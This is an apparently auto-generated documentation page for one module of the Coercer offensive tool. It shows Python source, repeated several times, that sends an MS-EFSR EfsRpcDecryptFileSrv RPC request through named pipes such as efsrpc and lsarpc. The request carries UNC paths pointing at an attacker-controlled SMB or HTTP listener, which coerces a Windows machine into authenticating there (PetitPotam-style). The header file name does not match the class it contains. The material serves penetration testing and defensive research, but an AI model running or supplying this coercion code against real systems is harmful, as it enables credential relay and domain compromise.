coercer.methods.MS_EFSR.EfsRpcDecryptFileSrv
1#!/usr/bin/env python3 2# -*- coding: utf-8 -*- 3# File name : EfsRpcOpenFileRaw.py 4# Author : Podalirius (@podalirius_) 5# Date created : 16 Sep 2022 6 7 8from coercer.models.MSPROTOCOLRPCCALL import MSPROTOCOLRPCCALL 9from coercer.network.DCERPCSessionError import DCERPCSessionError 10from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT 11from impacket.dcerpc.v5.dtypes import UUID, ULONG, WSTR, DWORD, LONG, NULL, BOOL, UCHAR, PCHAR, RPC_SID, LPWSTR, GUID 12 13 14class _EfsRpcDecryptFileSrv(NDRCALL): 15 """ 16 Structure to make the RPC call to EfsRpcDecryptFileSrv() in [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31) 17 """ 18 opnum = 5 19 structure = ( 20 ('FileName', WSTR), # Type: wchar_t * 21 ('OpenFlag', ULONG), # Type: unsigned 22 ) 23 24 25class _EfsRpcDecryptFileSrvResponse(NDRCALL): 26 """ 27 Structure to parse the response of the RPC call to EfsRpcDecryptFileSrv() in [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31) 28 """ 29 structure = () 30 31 32class EfsRpcDecryptFileSrv(MSPROTOCOLRPCCALL): 33 """ 34 Coercing a machine to authenticate using function EfsRpcDecryptFileSrv (opnum 5) of [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31) 35 36 Method found by: 37 - [@topotam77](https://twitter.com/topotam77) 38 """ 39 40 exploit_paths = [ 41 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'), 42 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'), 43 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'), 44 ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'), 45 ] 46 47 access = { 48 "ncan_np": [ 49 { 50 "namedpipe": r"\PIPE\efsrpc", 51 "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d", 52 "version": "1.0" 53 }, 54 { 55 "namedpipe": r"\PIPE\lsarpc", 56 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e", 57 "version": "1.0" 58 }, 59 { 60 "namedpipe": r"\PIPE\samr", 61 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e", 62 "version": "1.0" 63 }, 64 { 65 "namedpipe": r"\PIPE\lsass", 66 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e", 67 "version": "1.0" 68 }, 69 { 70 "namedpipe": r"\PIPE\netlogon", 71 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e", 72 "version": "1.0" 73 }, 74 ] 75 } 76 77 protocol = { 78 "longname": "[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol", 79 "shortname": "MS-EFSR" 80 } 81 82 function = { 83 "name": "EfsRpcDecryptFileSrv", 84 "opnum": 5, 85 "vulnerable_arguments": ["FileName"] 86 } 87 88 def trigger(self, dcerpc_session, target): 89 if dcerpc_session is not None: 90 try: 91 request = _EfsRpcDecryptFileSrv() 92 request['FileName'] = self.path 93 request['OpenFlag'] = 0 94 resp = dcerpc_session.request(request) 95 return "" 96 except Exception as err: 97 return err 98 else: 99 print("[!] Error: dce is None, you must call connect() first.") 100 return None
33class EfsRpcDecryptFileSrv(MSPROTOCOLRPCCALL): 34 """ 35 Coercing a machine to authenticate using function EfsRpcDecryptFileSrv (opnum 5) of [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31) 36 37 Method found by: 38 - [@topotam77](https://twitter.com/topotam77) 39 """ 40 41 exploit_paths = [ 42 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'), 43 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'), 44 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'), 45 ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'), 46 ] 47 48 access = { 49 "ncan_np": [ 50 { 51 "namedpipe": r"\PIPE\efsrpc", 52 "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d", 53 "version": "1.0" 54 }, 55 { 56 "namedpipe": r"\PIPE\lsarpc", 57 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e", 58 "version": "1.0" 59 }, 60 { 61 "namedpipe": r"\PIPE\samr", 62 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e", 63 "version": "1.0" 64 }, 65 { 66 "namedpipe": r"\PIPE\lsass", 67 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e", 68 "version": "1.0" 69 }, 70 { 71 "namedpipe": r"\PIPE\netlogon", 72 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e", 73 "version": "1.0" 74 }, 75 ] 76 } 77 78 protocol = { 79 "longname": "[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol", 80 "shortname": "MS-EFSR" 81 } 82 83 function = { 84 "name": "EfsRpcDecryptFileSrv", 85 "opnum": 5, 86 "vulnerable_arguments": ["FileName"] 87 } 88 89 def trigger(self, dcerpc_session, target): 90 if dcerpc_session is not None: 91 try: 92 request = _EfsRpcDecryptFileSrv() 93 request['FileName'] = self.path 94 request['OpenFlag'] = 0 95 resp = dcerpc_session.request(request) 96 return "" 97 except Exception as err: 98 return err 99 else: 100 print("[!] Error: dce is None, you must call connect() first.") 101 return None
Coercing a machine to authenticate using function EfsRpcDecryptFileSrv (opnum 5) of MS-EFSR Protocol
Method found by:
def
trigger(self, dcerpc_session, target):
89 def trigger(self, dcerpc_session, target): 90 if dcerpc_session is not None: 91 try: 92 request = _EfsRpcDecryptFileSrv() 93 request['FileName'] = self.path 94 request['OpenFlag'] = 0 95 resp = dcerpc_session.request(request) 96 return "" 97 except Exception as err: 98 return err 99 else: 100 print("[!] Error: dce is None, you must call connect() first.") 101 return None